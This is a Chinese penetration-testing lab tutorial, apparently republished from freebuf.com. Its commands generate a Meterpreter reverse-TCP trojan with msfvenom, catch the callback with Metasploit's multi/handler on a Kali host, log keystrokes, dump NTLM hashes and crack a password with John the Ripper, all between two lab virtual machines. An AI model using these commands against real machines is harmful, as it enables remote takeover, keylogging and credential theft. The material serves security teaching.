用Msfvenom生成木马并控制中木马的主机,实施用户密码破解 – 作者:yggcwhat

一、环境配置(两台主机均采用NAT桥接模式) 

1、Kali主机的IP配置:

1621762233_60aa20b9d0d47775b80d6.png!small?1621762233570

2、winxp主机的IP配置:1621762249_60aa20c9098980a5643e4.png!small?1621762248660

二、远程控制计算机 

1、利用msfvenom工具生成一个木马控制端—shell.exe,并把该木马程序保存到root用户下

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.22 lport=1211 -f exe > /root/shell.exe

1621762302_60aa20fe34f93465e4aa3.png!small?1621762301949

1621762314_60aa210a816eccfb57666.png!small?1621762314187

2、将shell.exe文件拷贝到WINXP的桌面上

1621762334_60aa211e34610414102ce.png!small?1621762333958

3、启用MSF攻击平台

1621762376_60aa2148eccce86addb65.png!small?1621762376798

4、加载模块和选择Payload

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

1621762412_60aa216cdcadd5c4997dc.png!small?1621762412517

5、设置Payload参数 Lhost为kali的IP,Lport 为kali监听的端口

msf5 exploit(multi/handler) > set lhost 192.168.1.22

msf5 exploit(multi/handler) > set lport 1211

1621762444_60aa218cd15b88b5a089e.png!small?1621762444583

6、双击执行WINXP主机上的shell.exe文件

7、在kali上实施渗透攻击

1621762465_60aa21a1309699abb8578.png!small?1621762464810

1621762475_60aa21abd94ec52a5b7f4.png!small?1621762475563

8、在kali上实施键盘记录

1)输入如下命令启用键盘记录功能

1621762501_60aa21c5e21381b5cc32f.png!small?1621762501562

(2)在windows xp2的CMD.exe环境下输入命令

1621762524_60aa21dcb97f98afee0ff.png!small?1621762524366

(3)在kali上打开键盘记录文件,可以看到文件中记录下来在windows xp2中输入的内容。

1621762541_60aa21ed6ad4c834549d5.png!small?1621762541119

9、用john(密码破解工具)破解windows xp2在任务1创建的用户(即自己姓名的拼音小写首字母)密码,实验中用户名为:zs ,密码为:police

(1)将用于破解的密码词典password.lst文件拷贝到root用户目录下

1621762573_60aa220d18631c3388d4e.png!small?1621762572743

(2)在kali上用命令hashdump获取windows xp2的用户名及加密后的密码(NTLM hash值)

1621762590_60aa221e8579a20b5285b.png!small?1621762590250

(3)将zs用户的密码NTLM hash值保存在zs.hash文件中,并查看

1621762628_60aa22442ac25aa368ab9.png!small?1621762627729

(4)启用john的图形化界面

1621762645_60aa22556e5d66757b4f5.png!small?1621762645086

1621762659_60aa2263bec6eefc8d9e4.png!small?1621762659390

(5)打开zs.hash文件进行破解

1621762688_60aa2280a3571c315ef5c.png!small?1621762688727

1621762717_60aa229dd0a80fdee53e9.png!small?1621762717533

(6)选择要破解的密码加密算法和密码词典(password.lst)

1621762739_60aa22b3e8d8b50cbeea0.png!small?1621762739643

(7)开始破解密码

1621762758_60aa22c65fea38883bcea.png!small?1621762758377

(8)密码破解成功

1621762775_60aa22d756ccbbfdc0b44.png!small?1621762775162

现在木马已经是非常常见的了,在我们的日常生活中计算机中了木马要怎么办?

发现电脑中了木马之后,第一件事儿要断网,因为木马不会对电脑有什么危害,但是它会把你电脑的一些信息游戏帐号等发给黑客,断网后,如果电脑没有杀毒软件,重启后就不停按F8,选择进入网络安全模式,在安全模式下木马没办法自动运行去盗号,然后在网络安全模式下,下载电脑的杀毒软件进行杀毒。

来源:freebuf.com 2021-05-23 17:42:16 by: yggcwhat

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论